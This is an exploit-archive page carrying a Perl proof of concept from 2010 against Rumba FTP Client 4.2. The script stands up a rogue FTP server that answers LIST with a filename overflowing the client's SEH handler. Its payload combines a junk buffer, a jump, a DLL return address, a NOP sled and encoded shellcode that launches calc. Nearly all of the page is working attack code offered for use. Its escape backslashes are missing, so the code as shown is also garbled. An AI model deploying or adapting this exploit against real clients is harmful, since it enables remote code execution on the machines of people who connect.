Rumba ftp Client 4.2 PASV BoF (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Rumba ftp Client 4.2 PASV BoF (SEH)
# Published : 2010-04-25
# Author : zombiefx
# Previous Title : Bigant Messenger <= v2.52 - (AntCore.dll) RegisterCom() Remote 0day Heap Overflow
# Next Title : HP Digital Imaging (hpodio08.dll) Insecure Method Exploit
# Email: darkernet[at]gmail.com
# Tested on: Windows XP SP3
# SEH overwrite occurs when sending the directory listing to the client with an
# overly long filename extension.*Note version 4.2.3 might also suffer from this.
# Usage: ./rumbaftp_exploit
# Code:
#!/usr/bin/perl
use warnings;
use strict;
use IO::Socket;
my $sock = IO::Socket::INET->new( LocalPort => '21', Proto => 'tcp', Listen => '1' )
  or die "Socket Not Created $!n";
print 
      "#############################################################n"
    . "#              Rumba ftp Client 4.2 PASV BoF (SEH)          #n"
    . "#                By: zombiefx                               #n"
    . "#         Listening on port 21 with pasv port of 31337      #n"
    . "#############################################################n";
my $pasvip = "127,0,0,1";
while ( my $data = $sock->accept() ) {
    print "Client Connected!nAwaiting Ftp commands: n";
    print $data "220 Gangsta Rap Made Me Do Itrn";
    while (<$data>) {
        print;
        print $data "331 Anonymous access allowedrn"                        if (/USER/i);
        print $data "230-Welcome to N0 M4Ns l4nd.rn230 User logged in.rn" if (/PASS/i);
        print $data "215 UNIX Type: L8 rn"                                  if (/SYST/i);
        print $data "257 "/" is current directory.rn"                     if (/PWD/i);
        print $data "200 Type set to I.rn"                                  if (/TYPE I/i);
        print $data "200 Type set to A.rn"                                  if (/TYPE A/i);
        print $data "214 Syntax: SITE - (site-specific commands)rn"         if (/HELP/i);
        print $data "227 Entering Passive Mode ($pasvip,122,105)rn"         if (/PASV/i);

        if (/LIST/i) {
            print $data "150 Here comes the directory listing.rn" . "226 Directory send OK.rn";
            &senddata( '122', '105' );
        }

    }
    print "Payload delivered check the client!n";
}

sub senddata {
    my $port     = $_[0] * 256  + $_[1];
    my $pasvsock = IO::Socket::INET->new( LocalPort => $port, Proto => 'tcp', Listen => '1' );
    my $pasvdata = $pasvsock->accept();
    my $junk    = "x77" x 1351;
    my $seh  = pack( 'V', 0x1006E534 );# located in ftplogic.dll
    my $nseh = "xebx06x90x90";
    my $nops = "x90" x 50;
    my $calcshell =
        "x89xe2xdaxc1xd9x72xf4x58x50x59x49x49x49x49"
      . "x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
      . "x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
      . "x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
      . "x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a"
      . "x48x50x44x43x30x43x30x45x50x4cx4bx47x35x47"
      . "x4cx4cx4bx43x4cx43x35x43x48x45x51x4ax4fx4c"
      . "x4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31x4a"
      . "x4bx51x59x4cx4bx46x54x4cx4bx43x31x4ax4ex50"
      . "x31x49x50x4cx59x4ex4cx4cx44x49x50x43x44x43"
      . "x37x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4a"
      . "x54x47x4bx51x44x46x44x43x34x42x55x4bx55x4c"
      . "x4bx51x4fx51x34x45x51x4ax4bx42x46x4cx4bx44"
      . "x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c"
      . "x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx47"
      . "x54x43x34x48x43x51x4fx46x51x4bx46x43x50x50"
      . "x56x45x34x4cx4bx47x36x50x30x4cx4bx51x50x44"
      . "x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx45x38x43"
      . "x38x4bx39x4ax58x4cx43x49x50x42x4ax50x50x42"
      . "x48x4cx30x4dx5ax43x34x51x4fx45x38x4ax38x4b"
      . "x4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43x45"
      . "x31x42x4cx42x43x45x50x41x41";

    my $payload = $junk . $nseh . $seh . $nops . $calcshell;

    print $pasvdata
      "-rw-rw-r--    1 1176     1176         1060 Apr 23 23:17  test.$payloadrnrn";
}